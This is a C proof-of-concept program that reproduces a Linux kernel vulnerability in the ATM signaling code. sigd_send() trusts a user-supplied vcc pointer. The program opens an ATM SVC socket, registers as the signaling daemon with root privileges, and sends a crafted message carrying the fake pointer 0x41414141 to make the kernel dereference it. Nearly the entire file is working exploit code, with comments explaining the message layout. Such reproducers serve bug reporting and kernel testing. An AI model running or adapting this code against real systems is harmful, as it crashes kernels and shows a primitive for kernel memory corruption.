atm_painc.c
/*
* Reproducer for ATM signaling sigd_send() vulnerability
*
* Bug: net/atm/signaling.c sigd_send() uses user-controlled
* msg->vcc pointer without validation.
*
* Requires: root (CAP_NET_ADMIN) and CONFIG_ATM enabled kernel
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <linux/atm.h>
#include <linux/atmsvc.h>
#ifndef AF_ATMSVC
#define AF_ATMSVC 9
#endif
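/*
 * Entry point: open an ATM SVC socket, register as the signaling daemon,
 * and send one atmsvc_msg-shaped buffer whose vcc field holds a fake
 * pointer (0x41414141).  The kernel-side trust boundary at issue is that
 * the vcc field carries a kernel pointer chosen entirely by user space.
 *
 * Returns 0 when sendmsg() was accepted by the kernel, 1 when socket(),
 * ioctl(ATMSIGD_CTRL) or sendmsg() fails (the failure is reported via
 * perror()).  Requires CAP_NET_ADMIN for the ATMSIGD_CTRL ioctl.
 */
int main(void)
{
    int fd;
    struct msghdr msg = {0};
    struct iovec iov;
    char buf[512] = {0};
    int type = 6;                    /* as_okay */
    unsigned long vcc = 0x41414141;  /* fake vcc pointer */
    ssize_t sent;

    /* Create ATM SVC socket */
    fd = socket(AF_ATMSVC, SOCK_DGRAM, 0);
    if (fd < 0) {
        perror("socket(AF_ATMSVC)");
        return 1;
    }

    /* Attach as signaling daemon - requires CAP_NET_ADMIN */
    if (ioctl(fd, ATMSIGD_CTRL) < 0) {
        perror("ioctl(ATMSIGD_CTRL)");
        close(fd);
        return 1;
    }

    /*
     * struct atmsvc_msg layout:
     *   offset 0: enum atmsvc_msg_type type (4 bytes)
     *   offset 4: atm_kptr_t vcc (8 bytes on 64-bit)
     *
     * sigd_send() reads msg->vcc from user data and dereferences
     * it directly without validation:
     *   vcc = *(struct atm_vcc **) &msg->vcc;
     *   sk = sk_atm(vcc); // BOOM!
     *
     * The fields are written with memcpy() rather than by casting buf+N to
     * (int *) / (unsigned long *): buf is a char array, so buf + 4 is not
     * guaranteed to be aligned for an unsigned long, and storing through a
     * pointer of a different type is undefined behaviour.  The bytes placed
     * in buf are the same either way.
     */
    memcpy(buf + 0, &type, sizeof type);
    memcpy(buf + 4, &vcc, sizeof vcc);

    iov.iov_base = buf;
    iov.iov_len = sizeof(buf);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;

    printf("Sending malicious message with fake vcc=0x41414141...\n");
    sent = sendmsg(fd, &msg, 0);
    if (sent < 0) {
        /*
         * The result used to be discarded, so a kernel that refuses the
         * message looked identical to one that accepted it.  Report it and
         * exit non-zero so the outcome on a given kernel is observable.
         */
        perror("sendmsg");
        close(fd);
        return 1;
    }

    close(fd);
    return 0;
}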